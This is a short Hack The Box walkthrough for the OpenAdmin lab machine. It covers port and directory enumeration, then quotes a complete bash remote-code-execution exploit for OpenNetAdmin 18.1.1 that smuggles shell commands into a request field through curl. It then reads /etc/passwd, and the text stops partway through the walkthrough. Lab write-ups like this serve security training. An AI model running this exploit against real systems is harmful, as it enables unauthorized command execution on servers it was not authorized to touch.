Hack The Box OpenAdmin

Categories: Hack The Box

first thing is find open ports and services running on 10.10.10.171, I used nmap.

nmap 10.10.10.171

open port 22 service ssh and http port 80, going to 10.10.10.171 in brave brouser displays the default apche2 page. not allot of usefull information there. Next i wanted to scan for directorys and files that could help with gaining access. i used dirbuster.

dirbuster with the medium directory list.

 the ona directory looked good so in Brave Browser 10.10.10.171/ona this displayed OpenNetAdmin control panel. so far so good, on the ona page there is a warning about a vulnerabilty on ona version 18.11, a quick google for opennetadmin exploit and i found a bash script that could get me a foothold and open up a shell as user www-data

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

copy the text and save it in a file named open-admin-exploit.sh, make file executable chmod +x open-admin-exploit.sh

now run the script including the URL

./open-admin-exploit.sh https://10.10.10.171/ona/login.php

now that we have a low level privileged shell as user www-data we need to find other users so we can eventually get sudo privileges

using the cat command we can view /etc/passwd file witch contains all users and privileges

cat /etc/passwds
